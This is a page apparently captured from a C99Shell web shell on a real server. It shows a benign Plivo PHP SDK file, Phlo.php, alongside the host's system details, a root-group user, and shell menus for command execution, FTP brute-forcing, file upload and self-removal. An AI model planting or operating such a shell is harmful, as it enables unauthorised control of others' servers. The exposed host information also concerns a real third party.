!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/plivo/plivo-php/src/Plivo/Resources/PHLO/   drwxr-xr-x
Free 29.11 GB of 117.98 GB (24.67%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Phlo.php (2.68 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Plivo\Resources\PHLO;

use 
Plivo\Resources\PHLO\MultiPartyCall\MultiPartyCall;
use 
Plivo\Resources\PHLO\ConferenceBridge\ConferenceBridge;
use 
Plivo\Resources\PHLO\Node\NodeClass;

/**
 * Class Phlo
 * @package Plivo\Resources\PHLO
 */
class Phlo
{
    
/**
     * @var null
     */
    
public $phloId;
    
/**
     * @var
     */
    
public $phlo;
    
/**
     * @var
     */
    
public $node;
    
/**
     * @var
     */
    
public $nodeMember;
    
/**
     * @var
     */
    
public $multiPartyCall;
    
/**
     * @var
     */
    
public $multiPartyCallMember;
    
/**
     * @var
     */
    
public $conferenceBridge;
    
/**
     * @var
     */
    
public $conferenceBridgeMember;
    
/**
     * @var null
     */
    
public $client;
    
/**
     * @var string
     */
    
public $phloUrl;
    
/**
     * @var null
     */
    
public $baseUrl;

    
/**
     * Phlo constructor.
     * @param null $client
     * @param null $id
     * @param null $baseUrl
     */
    
public function __construct($client null$id null$baseUrl null)
    {
        
$this->phloId $id;
        
$this->client $client;
        
$this->baseUrl $baseUrl;
        
$this->phloUrl =  $this->baseUrl "/phlo/" $this->phloId;
    }

    
/**
     * @param $id
     * @return Phlo
     */
    
public function get($id)
    {
        return new 
Phlo($this->client$id$this->baseUrl);
    }

    
/**
     * @param $id
     * @return mixed
     */
    
public function getPhlo($id)
    {
        
$phlo = new self($this->client$id$this->baseUrl); 
        
$response $phlo->client->getPhlorunner($phlo->phloUrl, []);
        return 
$response->getContent();
        
// return json_encode($response->getContent(), JSON_FORCE_OBJECT);
    
}

    
/**
     * @param null $nodeType
     * @param null $nodeId
     * @return NodeClass
     */
    
public function node($nodeType null$nodeId null)
    {
        
$this->node = new NodeClass($nodeType$nodeIdnull$this->client$this->phloUrl);
        return 
$this->node;
    }

    
/**
     * @return MultiPartyCall
     */
    
public function multiPartyCall()
    {
        
$this->multiPartyCall = new MultiPartyCall($thisnull$this->phloUrl);
        return 
$this->multiPartyCall;
    }

    
/**
     * @return ConferenceBridge
     */
    
public function conferenceBridge()
    {
        
$this->conferenceBridge = new ConferenceBridge($thisnull$this->phloUrl);
        return 
$this->conferenceBridge;
    }

    
/**
     * @param $arguments
     * @return mixed
     */
    
public function run($arguments = [])
    {
        
$phlorunner = new Phlorunner($this->client$this->phloId$this->baseUrl);
        return 
$phlorunner->run($arguments$this->client->authId);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0032 ]--